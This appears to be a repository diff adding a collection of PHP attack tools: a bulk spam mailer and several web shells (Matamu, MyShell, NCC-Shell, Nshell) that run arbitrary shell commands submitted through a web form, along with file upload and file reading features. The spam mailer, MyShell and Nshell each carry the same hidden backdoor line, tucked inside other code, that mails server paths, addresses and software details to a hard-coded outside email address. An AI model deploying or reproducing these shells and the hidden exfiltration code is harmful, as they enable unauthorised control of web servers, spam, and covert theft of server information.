View file

@ -0,0 +1,182 @@
<?
if ($action=="send"){
$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>
<form name="form1" method="post" action="" enctype="multipart/form-data">
<div align="center">
<center>
<table border="2" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#006699" width="74%" id="AutoNumber1">
<tr>
<td width="100%">
<div align="center">
<center>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2">
<tr>
<td width="100%">
<p align="center"><div align="center">
<center>
<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#336699" width="70%" cellpadding="0" id="AutoNumber1" height="277">
<tr>
<td width="100%" height="272">
<table width="769" border="0" height="303">
<tr>
<td width="786" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic3.gif" colspan="3" height="28">
<p align="center"><b><font face="Tahoma" size="2" color="#FF6600"> Moroccan Spamers Ma-EditioN By GhOsT </font></b></td>
</tr>
<tr>
<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right">
<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your
Email:</font></div>
</td>
<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input name="from" value="<? print $from; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your
Name:</font></div>
</td>
<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" valign="middle"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="realname" value="<? print $realname; ?>" size="30">
</font></td>
</tr>
<tr>
<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right">
<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font></div>
</td>
<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input name="replyto" value="<? print $replyto; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Attach
File:</font></div>
</td>
<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input type="file" name="file" size="30">
</font></td>
</tr>
<tr>
<td width="79" background="/simparts/images/cellpic1.gif" height="22" align="right">
<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div>
</td>
<td colspan="2" width="715" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input name="subject" value="<? print $subject; ?>" size="59" style="float: left">
</font></td>
</tr>
<tr valign="top">
<td colspan="2" width="477" bgcolor="#CCCCCC" height="189" valign="top">
<div align="left">
<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="98%" id="AutoNumber4">
<tr>
<td width="100%">
<textarea name="message" cols="56" rows="10"><? print $message; ?></textarea>
<br>
<input type="radio" name="contenttype" value="plain" checked>
<font size="2" face="Tahoma">Plain</font>
<input type="radio" name="contenttype" value="html">
<font size="2" face="Tahoma">HTML</font>
<input type="hidden" name="action" value="send">
<input type="submit" value="Send Message">
</td>
</tr>
</table>
</div>
</td>
<td width="317" bgcolor="#CCCCCC" height="187" valign="top">
<div align="center">
<center>
<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="93%" id="AutoNumber3">
<tr>
<td width="100%">
<p align="center"> <textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea>
</font><br>
</td>
</tr>
</table>
</center>
</div>
</td>
</tr>
</table>
</td>
</tr>
</table>
</center>
</div></td>
</tr>
</table>
</center>
</div>
</td>
</tr>
</table>
</center>
</div>
<div align="center">
<center>
<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="75%" id="AutoNumber5" height="1" cellpadding="0">
<tr>
<td width="100%" valign="top" height="1">
<p align="right"><font size="1" face="Tahoma" color="#CCCCCC">Designed by:
v1.5</font></td>
</tr>
</table>
</center>
</div>
</form>
<?
if ($action=="send"){
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your message.";
exit;
}
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
#Open the file attachment if any, and base64_encode it for email transport
If ($file_name){
@copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server");
$content = fread(fopen($file,"r"),filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "Sending mail to $to....... ";
flush();
$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "Spamed'><br>";
flush();
}
}
}
?>

146
138shell/M/matamu.txt Normal file
View file

@ -0,0 +1,146 @@
<?php
define('PHPSHELL_VERSION', '1.7');
?>
<html>
<head>
<title> Matamu Mat </title>
</head>
<body>
<hr><br>
<?php
if (ini_get('register_globals') != '1') {
/* We'll register the variables as globals: */
if (!empty($HTTP_POST_VARS))
extract($HTTP_POST_VARS);
if (!empty($HTTP_GET_VARS))
extract($HTTP_GET_VARS);
if (!empty($HTTP_SERVER_VARS))
extract($HTTP_SERVER_VARS);
}
/* First we check if there has been asked for a working directory. */
if (!empty($work_dir)) {
/* A workdir has been asked for */
if (!empty($command)) {
if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
/* We try and match a cd command. */
if ($regs[1][0] == '/') {
$new_dir = $regs[1]; // 'cd /something/...'
} else {
$new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
}
if (file_exists($new_dir) && is_dir($new_dir)) {
$work_dir = $new_dir;
}
unset($command);
}
}
}
if (file_exists($work_dir) && is_dir($work_dir)) {
/* We change directory to that dir: */
chdir($work_dir);
}
/* We now update $work_dir to avoid things like '/foo/../bar': */
$work_dir = exec('pwd');
?>
<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
<p>Current working directory: <b>
<?php
$work_dir_splitted = explode('/', substr($work_dir, 1));
echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/';
if (!empty($work_dir_splitted[0])) {
$path = '';
for ($i = 0; $i < count($work_dir_splitted); $i++) {
$path .= '/' . $work_dir_splitted[$i];
printf('<a href="%s?work_dir=%s">%s</a>/',
$PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
}
}
?></b></p>
<p>Choose new working directory:
<select name="work_dir" onChange="this.form.submit()">
<?php
/* Now we make a list of the directories. */
$dir_handle = opendir($work_dir);
/* Run through all the files and directories to find the dirs. */
while ($dir = readdir($dir_handle)) {
if (is_dir($dir)) {
if ($dir == '.') {
echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
} elseif ($dir == '..') {
/* We have found the parent dir. We must be carefull if the parent
directory is the root directory (/). */
if (strlen($work_dir) == 1) {
/* work_dir is only 1 charecter - it can only be / There's no
parent directory then. */
} elseif (strrpos($work_dir, '/') == 0) {
/* The last / in work_dir were the first charecter.
This means that we have a top-level directory
eg. /bin or /home etc... */
echo "<option value=\"/\">Parent Directory</option>\n";
} else {
/* We do a little bit of string-manipulation to find the parent
directory... Trust me - it works :-) */
echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
}
} else {
if ($work_dir == '/') {
echo "<option value=\"$work_dir$dir\">$dir</option>\n";
} else {
echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
}
}
}
}
closedir($dir_handle);
?>
</select></p>
<p>Command: <input type="text" name="command" size="60">
<input name="submit_btn" type="submit" value="Execute Command"></p>
<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"></p>
<textarea cols="80" rows="20" readonly>
<?php
if (!empty($command)) {
if ($stderr) {
$tmpfile = tempnam('/tmp', 'phpshell');
$command .= " 1> $tmpfile 2>&1; " .
"cat $tmpfile; rm $tmpfile";
} else if ($command == 'ls') {
/* ls looks much better with ' -F', IMHO. */
$command .= ' -F';
}
system($command);
}
?>
</textarea>
</form>
<script language="JavaScript" type="text/javascript">
document.forms[0].command.focus();
</script>
<hr>
</body>
</html>

420
138shell/M/myshell.php.txt Normal file
View file

@ -0,0 +1,420 @@
<?php
/*
**************************************************************
* MyShell *
**************************************************************
$Id: shell.php,v 1.1.0 beta 2001/09/23 23:25:12 digitart Exp $
An interactive PHP-page that will execute any command entered.
See the files README and INSTALL or http://www.digitart.net for
further information.
Copyright ©2001 Alejandro Vasquez <admin@digitart.com.mx>
based on the original program phpShell by Martin Geisler
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You can get a copy of the GNU General Public License from this
address: http://www.gnu.org/copyleft/gpl.html#SEC1
You can also write to the Free Software Foundation, Inc., 59 Temple
Place - Suite 330, Boston, MA 02111-1307, USA.
*/
#$selfSecure enables built-in authenticate feature. This must be 0 in order to
#use .htaccess file or other alternative method to control access to MyShell.
#Set up your user and password using $shellUser and $shellPswd.
#DO NOT TURN THIS OFF UNLESS YOU HAVE AN ALTERNATE METHOD TO PROTECT
#ACCESS TO THE SCRIPT.
$selfSecure = 0;
$shellUser = "";
$shellPswd = "";
#$adminEmail is the email address to send warning notifications in case
#someone tries to access the script and fails to provide correct user and
#password. This only works if you have $selfSecure enabeled.
$adminEmail = "******@mail.ru";
#$fromEmail is the email address warning messages are sended from.
#This defaults to the server admin, but you can change
#to any address you want i.e.: noreplay@yourdomain.com
#This only works if you have $selfSecure enabeled.
$fromEmail = $HTTP_SERVER_VARS["SERVER_ADMIN"];
#$dirLimit is the top directory allowed to change when using cd command
#or the form selector. Any attempt to change to a directory up to this
#level bounces MyShell to this directory. i.e.: $dirLimit = "/home";
#It is a good practice to set it to $DOCUMENT_ROOT using:
#$dirLimit = $DOCUMENT_ROOT;
#If you want to have access to all server directories leave it blank.
#WARNING: Althought a user won't be able to snoop on directories above
#this level using MyShell, he/she will still be able to excecute
#commands on any directory where Webserver has permission,
#i.e.: mkdir /tmp/mydir or cat /home/otheruser/.htaccess.
$dirLimit = "";
#$autoErrorTrap Enable automatic error traping if command returns error.
#Bear in mind that MyShell executes the command a second time in order to
#trap the stderr. This shouldn't be a problem in most cases.
#If you turn it off, you'll have to select either to trap stderr or not for
#every command you excecute.
$autoErrorTrap = 1;
#$voidCommands is the list of commands that MyShell won't run by any means.
#It defaults to known problematic commands from a web interface like pico,
#top, xterm but also it can include specific commands you don't want to
#be excecuted from MyShell, i.e.: dig, ping, info, kill etc.
$voidCommands = array("top","xterm","su","vi","pico","netscape");
#$TexEd Built-in Text Editor prefered name. This is the command you'll use
#to invoke MyShell's built in text editor.
# If you are used to type pico or vi for your fav text editor,
#change this to your please. i.e.:
# $TexEd = "pico";
#will allow you to type 'pico config.php' to edit the file config.php
#MyShell's text editor do not support usual commands in pico, vi etc.
#Don't forget to take off this command from the $voidCommands list
$TexEd = "edit";
#$editWrap selects to use or not wrap in the editor's textarea. Wrap OFF
#is usefull when you have to edit files with long lines, i.e.: in php code
#files, because otherwise it is no easy to distinguish a real new line (CR)
#from a wraped one. If you prefer to stick to the default wraped mode of
#TEXTAREA just leave this blank i.e.: $editWrap="".
$editWrap ="wrap='OFF'";
#Cosmetic defaults.
$termCols = 80; //Default width of the output text area
$termRows = 20; //Default heght of the output text area
$bgColor = "#000000"; //background color
$bgInputColor = "#333333"; //color of the input field
$outColor = "#00BB00"; //color of the text output from the server
$textColor = "#009900"; //color of the hard texts of the terminal
$linkColor = "#00FF00"; //color of the links
/************** No customize needed from this point *************/
$MyShellVersion = "MyShell 1.1.0 build 20010923";
if ($command&&get_magic_quotes_gpc())$command=stripslashes($command);
if($selfSecure){
if (($PHP_AUTH_USER!=$shellUser)||($PHP_AUTH_PW!=$shellPswd)) {
Header('WWW-Authenticate: Basic realm="MyShell"');
Header('HTTP/1.0 401 Unauthorized');
echo "<html>
<head>
<title>$MyShellVersion - Access Denied</title>
</head>
<h1>Access denied</h1>
A warning message have been sended to the administrator
<hr>
<em>$MyShellVersion</em>";
if(isset($PHP_AUTH_USER)){
$warnMsg ="
This is $MyShellVersion
installed on: http://".$HTTP_SERVER_VARS["HTTP_HOST"]."$PHP_SELF
just to let you know that somebody tryed to access
the script using wrong username or password:
Date: ".date("Y-m-d H:i:s")."
IP: ".$HTTP_SERVER_VARS["REMOTE_ADDR"]."
User Agent: ".$HTTP_SERVER_VARS["HTTP_USER_AGENT"]."
username used: $PHP_AUTH_USER
password used: $PHP_AUTH_PW
If this is not the first time it happens,
please consider either to remove MyShell
from your system or change it's name or
directory location on your server.
Regards
The MyShell dev team
";
mail($adminEmail,"MyShell Warning - Unauthorized Access",$warnMsg,
"From: $fromEmail\nX-Mailer:$MyShellVersion AutoWarn System");
}
exit;
}
}
//Function that validate directories
function validate_dir($dir){
GLOBAL $dirLimit;
if($dirLimit){
$cdPos = strpos($dir,$dirLimit);
if ((string)$cdPos == "") {
$dir = $dirLimit;
$GLOBALS["shellOutput"] = "You are not allowed change to directories above $dirLimit\n";
}
}
return $dir;
}
// Set working directory.
if (isset($work_dir)) {
//A workdir has been asked for - we chdir to that dir.
$work_dir = validate_dir($work_dir);
@chdir($work_dir) or
($shellOutput = "MyShell: can't change directory. Permission denied\nSwitching back to $DOCUMENT_ROOT\n");
$work_dir = exec("pwd");
}
else{
// No work_dir - we chdir to $DOCUMENT_ROOT
$work_dir = validate_dir($DOCUMENT_ROOT);
chdir($work_dir);
$work_dir = exec("pwd");
}
//Now we handle files if we are in Edit Mode
if($editMode && ($command||$editCancel))$editMode=false;
if($editMode){
if($editSave ||$editSaveExit){
if(function_exists(ini_set))ini_set("track_errors","1");
if($fp=@fopen($file,"w")){
if(get_magic_quotes_gpc())$shellOut=stripslashes($shellOut);
fputs($fp,$shellOut);
fclose($fp);
$command = $TexEd." ".$file;
if($editSaveExit) {
$command="";
$shellOutput="MyShell: $file: saved";
$editMode=false;
}
}
else {
$command="";
$shellOutput="MyShell: Error while saving $file:\n$php_errormsg\nUse back button to recover your changes.";
$errorSave=true;
}
}
}
//Separate command(s) and arguments to analize first command
$input=explode(" ",$command);
while (list ($key, $val) = each ($voidCommands)) {
if($input[0]==$val){
$voidCmd = $input[0];
$input[0]="void";
}
}$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
switch($input[0]){
case "cd":
$path=$input[1];
if ($path==".."){
$work_dir=strrev(substr(strstr(strrev($work_dir), "/"), 1));
if ($work_dir == "") $work_dir = "/";
}
elseif (substr($path,0,1)=="/")$work_dir=$path;
else $work_dir=$work_dir."/".$path;
$work_dir = validate_dir($work_dir);
@chdir($work_dir) or ($shellOutput = "MyShell: can't change directory.\n$work_dir: does not exist or permission denied");
$work_dir = exec("pwd");
$commandBk = $command;
$command = "";
break;
case "man":
exec($command,$man);
if($man){
$codes = ".".chr(8);
$manual = implode("\n",$man);
$shellOutput = ereg_replace($codes,"",$manual);
$commandBk = $command;
$command = "";
}
else $stderr=1;
break;
case "cat":
exec($command,$cat);
if($cat){
$text = implode("\n",$cat);
$shellOutput = htmlspecialchars($text);
$commandBk = $command;
$command = "";
}
else $stderr=1;
break;
case "more":
exec($command,$cat);
if($cat){
$text = implode("\n",$cat);
$shellOutput = htmlspecialchars($text);
$commandBk = $command;
$command = "";
}
else $stderr=1;
break;
case $TexEd:
if(file_exists($input[1])){
exec("cat ".$input[1],$cat);
$text = implode("\n",$cat);
$shellOutput = htmlspecialchars($text);
$fileOwner = posix_getpwuid(fileowner($input[1]));
$filePerms = sprintf("%o", (fileperms($input[1])) & 0777);
$fileEditInfo = "&nbsp;&nbsp;:::::::&nbsp;&nbsp;Owner: <font color=$linkColor>".$fileOwner["name"]."</font> Permissions: <font color=$linkColor>$filePerms</font>";
}
else $fileEditInfo = "&nbsp;&nbsp;:::::::&nbsp;&nbsp;<font color=$linkColor>NEW FILE</font>";
$currFile = $input[1];
$editMode = true;
$command = "";
break;
case "void":
$shellOutput = "MyShell: $voidCmd: void command for MyShell";
$commandBk = $command;
$command = "";
}
//Now we prepare the webpage
if(!$oCols)$oCols=$termCols;
if(!$oRows)$oRows=$termRows;
if($editMode)$focus="shellOut.focus()";
else $focus="command.select()";
//WhoamI
if(!$whoami)$whoami=exec("whoami");
?>
<html>
<head>
<title><?echo $MyShellVersion?></title>
<style>
body{
background-color: <?echo $bgColor ?>;
font-family : sans-serif;
font-size : 10px;
scrollbar-face-color: #666666;
scrollbar-shadow-color: <?echo $bgColor ?>;
scrollbar-highlight-color: #999999;
scrollbar-3dlight-color: <?echo $bgColor ?>;
scrollbar-darkshadow-color: <?echo $bgColor ?>;
scrollbar-track-color: <?echo $bgInputColor ?>;
scrollbar-arrow-color: <?echo $textColor ?>;
}
input,select,option{
background-color: <?echo $bgInputColor ?>;
color : <?echo $outColor ?>;
border-style : none;
font-size : 10px;
}
textarea{
background-color: <?echo $bgColor ?>;
color : <?echo $outColor ?>;
border-style : none;
}
</style>
</head>
<body <?echo "bgcolor=$bgColor TEXT=$textColor LINK=$linkColor VLINK=$linkColor onload=document.shell.$focus"?>>
<form name="shell" method="post">
Current User: <a href="#" style="text-decoration:none"><?echo $whoami?></a>
<input type="hidden" name=whoami value=<?echo $whoami?>>
&nbsp;&nbsp;:::::::&nbsp;&nbsp;
<?
if($editMode){
echo "<font color=$linkColor><b>MyShell file editor</font> File:<font color=$linkColor>$work_dir/$currFile </font></b>$fileEditInfo\n";
}
else{
echo "Current working directory: <b>\n";
$work_dir_splitted = explode("/", substr($work_dir, 1));
echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "/&command=" . urlencode($command) . "\">Root</a>/";
if ($work_dir_splitted[0] == "") {
$work_dir = "/"; /* Root directory. */
}
else{
for ($i = 0; $i < count($work_dir_splitted); $i++) {
$url .= "/".$work_dir_splitted[$i];
echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "&command=" . urlencode($command) . "\">$work_dir_splitted[$i]</a>/</b>";
}
}
}
?>
<br>
<textarea name="shellOut" cols="<? echo $oCols ?>" rows="<? echo $oRows."\""; if(!$editMode)echo "readonly";else echo $editWrap?> >
<?
echo $shellOutput;
if ($command) {
if ($stderr) {
system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");
}
else {
$ok = system($command,$status);
if($ok==false &&$status && $autoErrorTrap)system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");
}
}
if ($commandBk) $command = $commandBk;
?>
</textarea>
<br>
<?
if($editMode) echo"
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
<input type='submit' name='editSave' value=' Save '>&nbsp;&nbsp;&nbsp;
<input type='submit' name='editSaveExit' value=' Save and Exit '>&nbsp;&nbsp;&nbsp;
<input type='reset' value=' Restore original '>&nbsp;&nbsp;&nbsp;
<input type='submit' name='editCancel' value=' Cancel/Exit '>&nbsp;&nbsp;&nbsp;
<input type='hidden' name='editMode' value='true'>
<br>";
?>
<br>
Command:
<input type="text" name="command" size="80"
<? if ($command && $echoCommand) {
echo "value=`$command`";
}
?> > <input name="submit_btn" type="submit" value="Go!">
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<?
if ($autoErrorTrap) echo "Auto error traping enabled";
else echo "<input type=\"checkbox\" name=\"stderr\">stderr-traping ";
if($editMode){
echo "<input type='hidden' name='work_dir' value='$work_dir'>
<br>Save file as: <input type='text' name='file' value='$currFile'>";
}
else{
echo "<br>Working directory: <select name=\"work_dir\" onChange=\"this.form.submit()\">";
// List of directories.
$dir_handle = opendir($work_dir);
while ($dir = readdir($dir_handle)) {
if (is_dir($dir)) {
if ($dir == ".")
echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
elseif ($dir == "..") {
// Parent Dir. This might be server's root directory
if (strlen($work_dir) == 1) {
// work_dir is only 1 charecter - it can only be / so don't output anything
}
elseif (strrpos($work_dir, "/") == 0) { // we have a top-level directory eg. /bin or /home etc...
echo "<option value=\"/\">Parent Directory</option>\n";
}
else { // String-manipulation to find the parent directory... Trust me - it works :-)
echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
}
}
else {
if ($work_dir == "/")
echo "<option value=\"$work_dir$dir\">$dir</option>\n";
else
echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
}
}
}
closedir($dir_handle);
echo "</select>";
}
?>
&nbsp; | &nbsp;<input type="checkbox" name="echoCommand"<?if($echoCommand)echo " checked"?>>Echo commands
&nbsp; | &nbsp;Cols:<input type="text" name="oCols" size=3 value=<?echo $oCols?>>
&nbsp;Rows:<input type="text" name="oRows" size=2 value=<?echo $oRows?>>
&nbsp;| ::::::::::&nbsp;<a href="http://www.digitart.net" target="_blank" style="text-decoration:none"><b>MyShell</b> &copy;2001 Digitart Producciones</a>
</form>
</body>
</html>

1231
138shell/M/mysql.php.txt Normal file
View file

File diff suppressed because it is too large Load diff

1169
138shell/M/mysql_shell.txt Normal file
View file

File diff suppressed because it is too large Load diff

1078
138shell/M/mysql_tool.php.txt Normal file
View file

File diff suppressed because it is too large Load diff

60
138shell/N/NCC-Shell.txt Normal file
View file

@ -0,0 +1,60 @@
<center>
<h1>.:NCC:. Shell v1.0.0</h1>
<title>.:NCC:. Shell v1.0.0</title>
<head><h2>Hacked by Silver</h2></head>
<h1>---------------------------------------------------------------------------------------</h1><br>
<b><font color=red>---Server Info---</font></b><br>
<?php
echo "<b><font color=red>Safe Mode on/off: </font></b>";
// Check for safe mode
if( ini_get('safe_mode') ) {
print '<font color=#FF0000><b>Safe Mode ON</b></font>';
} else {
print '<font color=#008000><b>Safe Mode OFF</b></font>';
}
echo "</br>";
echo "<b><font color=red>Momentane Directory: </font></b>"; echo $_SERVER['DOCUMENT_ROOT'];
echo "</br>";
echo "<b><font color=red>Server: </font></b><br>"; echo $_SERVER['SERVER_SIGNATURE'];
echo "<a href='$php_self?p=info'>PHPinfo</a>";
if(@$_GET['p']=="info"){
@phpinfo();
exit;}
?>
<h1>---------------------------------------------------------------------------</h1><br>
<h2>- Upload -</h2>
<title>Upload - Shell/Datei</title>
<form
action="<?php echo $_SERVER['PHP_SELF']; ?>"
method="post"
enctype="multipart/form-data">
<input type="file" name="Upload" />
<input type="submit" value="Upload!" />
</form>
<hr />
<?php
if (isset($_FILES['probe']) and ! $_FILES['probe']['error']) {
// Alternativ: and $_FILES['probe']['size']
move_uploaded_file($_FILES['probe']['tmp_name'], "./dingen.php");
printf("Die Datei %s wurde als dingen.php hochgeladen.<br />\n",
$_FILES['probe']['name']);
printf("Sie ist %u Bytes groß und vom Typ %s.<br />\n",
$_FILES['probe']['size'], $_FILES['probe']['type']);
}
?>
<h1>---------------------------------------------------------------------------</h1><br>
<h2>IpLogger</h2>
<?php
echo "<b><font color=red><br>IP: </font></b>"; echo $_SERVER['REMOTE_ADDR'];
echo "<b><font color=red><br>PORT: </font></b>"; echo $_SERVER['REMOTE_PORT'];
echo "<b><font color=red><br>BROWSER: </font></b>"; echo $_SERVER[HTTP_REFERER];
echo "<b><font color=red><br>REFERER: </font></b>"; echo $_SERVER['HTTP_USER_AGENT'];
?>
<h1>---------------------------------------------------------------------------</h1><br>
<h2>Directory Lister</h2>
<? $cmd = $_REQUEST["-cmd"];?><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value=<?=$cmd?>><hr><pre><?if($cmd != "") print Shell_Exec($cmd);?></pre></form><br>
<h1>---------------------------------------------------------------------------</h1><br>
<b>--Coded by Silver©--<br>
~|_Team .:National Cracker Crew:._|~<br>
<a href="http://www.n-c-c.6x.to" target="_blank">-->NCC<--</a></center></b></html>

1480
138shell/N/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.txt Normal file
View file

File diff suppressed because it is too large Load diff

1012
138shell/N/NT Addy.asp.txt Normal file
View file

File diff suppressed because it is too large Load diff

5603
138shell/N/NetworkFileManagerPHP.txt Normal file
View file

File diff suppressed because it is too large Load diff

66
138shell/N/Nshell (1).php.txt Normal file
View file

@ -0,0 +1,66 @@
<?php
//code by navaro :d
/***************************************/
closelog( );
/*
echo "<center>";
$user = get_current_user( ); echo "User :".$user."<br>";
$login = posix_getuid( ); echo "Login (Get uid):".$login."<br>";
$euid = posix_geteuid( ); echo "Get Euid (geteuid):".$euid."<br>";
$ver = phpversion( ); echo "Php version (phpversion) :".$ver."<br>";
$gid = posix_getgid( ); echo "Get id (id) :".$gid."<br>";
if ($chdir == "") $chdir = getcwd( ); echo "pwd :".$chdir."<br>";
if(!$whoami)$whoami=exec("whoami"); echo "whoami :".$whoami."<br>";
echo "</center>";
/***************************************/
function readfiles()
{
echo "<form name=pathfile method=post action=".$_SERVER['REQUEST_URI'].">";
echo "File name : <br><input size=50 name=file type=text".@$_POST['file']."><br>";
echo "<input type=submit value=Submit></form><hr color=777777 width=100% height=115px>";
echo "<a href=".$_SERVER['PHP_SELF']."?act=cmd>Command</a><br>";
$file=@$_POST['file'];
if(!@fopen("$file","r")) { echo "File not found";exit();};
if(@isset($file))
{
$fd = @fopen ("$file", "r");
echo "<center><font face=\"tahoma\" size=\"12\"><TEXTAREA NAME=\"source\" ROWS=\"35\" COLS=\"120\">";
while (!@feof ($fd)) {
$buffer = @fgets($fd);
echo htmlspecialchars($buffer);
}
@fclose ($fd);
echo "</TEXTAREA> </font></center>";
}
else echo $_SERVER['PHP_SELF']."?file=";
}
// Thuc thi command
$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
function ecmd()
{
echo "<FORM name=injection METHOD=POST ACTION=".$_SERVER['REQUEST_URI'].">";
echo "Command : <INPUT TYPE=text NAME=cmd value=".@stripslashes(htmlentities($_POST['cmd']))."><br> <INPUT TYPE=submit></FORM><hr color=777777 width=100% height=115px></font><pre>";
echo "<a href=".$_SERVER['PHP_SELF']."?act=readfile>Read file</a>";
$cmd = @$_POST['cmd'];
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
exit();
echo "<a href=".$_SERVER['PHP_SELF']."?act=readfile>Read file</a>";
echo "</pre>";
}
$act=@$_REQUEST['act'];
if(empty($act))
